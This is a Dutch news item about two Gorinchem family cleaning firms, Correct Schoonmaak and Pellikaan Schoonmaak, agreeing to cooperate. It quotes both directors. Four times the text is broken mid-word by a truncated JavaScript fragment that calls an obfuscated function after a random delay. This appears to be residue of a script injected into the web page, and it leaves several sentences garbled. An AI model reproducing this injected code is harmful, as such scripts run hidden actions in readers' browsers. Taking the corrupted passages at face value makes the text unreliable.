Correct-Groep en Pelikaan Schoonmaak samen verder

Twee familiebedrijven uit Gorinchem, met een hart voor schoonmaak, gaan samen verder. De intentieovereenkomst hiervan is gisteren getekend door Antonie van Helden en Pieter Pellikaan.
Correct Schoonmaak is een onderdeel van Correct-Groep en is een familiebedrijf dat bestaat sinds 1977. Zij zijn actief in bijna alle sectoren. Van particulieren tot overheidsinstellingen en van scholen tot ziekenhuizen. Correct Schoonmaak is lid van de OSB, daardoor is de klant verzekerd van een fatsoenlijke schoonmaakoplossing. “Ons bedrijf, Pellikaan Schoonmaak, bestaat al meer dan 50 jaar en in die tijd zijn wij gegroeid. Lang geleden is mijn vader, Pieter Pellikaan, gestart door met geleend geld een fietskar en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander werkmateriaal aan te schaffen. Van een provisorisch begin is het bedrijf langzaam gegroeid tot zijn huidige vorm. U kunt begrijpen dat ik hier trots op ben en graag wil werken aan een nog betere dienstverlening”, zo vertelt Pieter Pellikaan. “Daarom hebben wij de afgelopen tijd gewerkt aan het aangaan van een samenwerking met Correct Schoonmaak, ook uit Gorinchem. Zij zijn, net als Pellikaan Schoonmaak, een familiebedrijf met een hart voor schoonmaak. Er zijn veel overeenkomsten tussen ons. Door samen te gaan kunnen wij elkaar versterken, door kennis en ervaring uit te wisselen, maar ook door nog betere apparatuur aan te kunnen schaffen. Vanzelfsprekend is de continuïteit door deze samenwerking alleen maar groter geworden,” zo geeft Pellikaan aan.
Antonie van Helden, directeur van Correct-Groep vult aan: “Er is veel vertrouwen tussen ons. Omdat de klik tussen ons beiden zo goed was, hebben wij de stap gezet om samen verder te gaan. Op deze wijze hebben wij een nog betere positie in de regio Gorinchem. Belangrijk om te weten is , dat er voor de bestaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande klanten van Pellikaan Schoonmaak niets verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderd. De vertrouwde gezichten blijven komen en het factuurbedrag gaat al zeker niet omhoog. Het enige wat wel verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andert is het logo.”